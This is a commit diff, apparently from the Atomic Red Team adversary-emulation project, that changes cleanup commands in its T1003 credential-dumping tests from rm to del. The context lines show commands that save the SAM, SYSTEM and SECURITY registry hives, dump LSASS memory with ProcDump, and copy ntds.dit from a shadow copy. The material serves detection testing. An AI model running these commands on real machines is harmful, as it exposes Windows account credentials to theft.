T1003 rm (#778)

* show executor and privilege requirement

* added an atomic to add c2 domain under trusted zoneMap

* corrected typos

* modified adding a domain by creating one the key is not there

* moved registry modification atomic under T1112

* updated local execution file to be current

* corrected typos

* replaced rm by del for tests with executor as command_prompt

* changing rm to del for command_prompt

* Update T1102.yaml

* Update T1112.yaml

my local repo was behind. This file wasn't changed this time.

Co-authored-by: Carrie Roberts <clr2of8@gmail.com>

atomics/T1003/T1003.yaml

@@ -76,9 +76,9 @@ atomic_tests:
       reg save HKLM\system "#{output_folder}\system"
       reg save HKLM\security "#{output_folder}\security"
     cleanup_command: |
-      rm "#{output_folder}\sam"
-      rm "#{output_folder}\system"
-      rm "#{output_folder}\security"
+      del "#{output_folder}\sam"       >nul 2> nul
+      del "#{output_folder}\system"    >nul 2> nul
+      del "#{output_folder}\security"  >nul 2> nul
 
 - name: Dump LSASS.exe Memory using ProcDump
   description: |
@@ -104,7 +104,7 @@ atomic_tests:
     command: |
       #{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
     cleanup_command: |
-      rm "#{output_file}"
+      del "#{output_file}" >nul 2> nul
 
 - name: Dump LSASS.exe Memory using Windows Task Manager
   description: |
@@ -221,9 +221,9 @@ atomic_tests:
       copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
       reg save HKLM\SYSTEM #{extract_path}\SYSTEM_HIVE
     cleanup_command: |
-      rm "#{extract_path}\ntds.dit"
-      rm "#{extract_path}\VSC_SYSTEM_HIVE"
-      rm "#{extract_path}\SYSTEM_HIVE"
+      del "#{extract_path}\ntds.dit"        >nul 2> nul
+      del "#{extract_path}\VSC_SYSTEM_HIVE" >nul 2> nul
+      del "#{extract_path}\SYSTEM_HIVE"     >nul 2> nul
 
 - name: GPP Passwords (findstr)
   description: |